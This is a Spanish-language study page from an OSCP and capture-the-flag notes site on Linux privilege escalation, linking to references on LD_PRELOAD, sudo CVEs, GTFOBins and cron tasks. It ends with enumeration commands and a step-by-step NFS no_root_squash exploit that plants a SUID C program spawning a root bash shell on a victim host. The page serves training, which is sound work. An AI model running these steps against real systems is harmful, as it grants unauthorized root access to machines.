xerosec
Ctrlk
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
    • TryHackMe
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  1. Apuntes y recursos OSCP
  2. Linux

Linux Privesc

LD_Preload Privesc

LogoLinux Privilege Escalation using LD_PreloadHacking Articles

Sudo binary privesc

Sudo <1.8.28

Logosudo 1.8.27 - Security BypassExploit Database

Sudo <1.8.30 y pwfeedback habilitado

LogoGitHub - saleemrashid/sudo-cve-2019-18634: Proof of Concept for CVE-2019-18634GitHub

SUID

Capabilities

NFS Root Squashing

Tareas programadas

LogoPayloadsAllTheThings/Methodology and Resources/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Docker

Logodocker | GTFOBinsgtfobins.github.io

Enlaces adicionales

LogoGTFOBinsgtfobins.github.io
Logotar | GTFOBinsgtfobins.github.io
AnteriorLinux BasicsSiguienteWindows

Última actualización hace 1 año

find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/exports
#Si una carpeta tiene la flag “no_root_squash” se puede montar con NFS y los archivos serán creados como root (id 0)
#Desde la máquina atacante
showmount -e <IP_VÍCTIMA>
mkdir /tmp/mountme
mount -o rw,vers=2 <IP_VÍCTIMA>:/tmp /tmp/mountme
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }’ > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +s /tmp/mountme/x
#Desde la máquina víctima
./x
cat /etc/crontab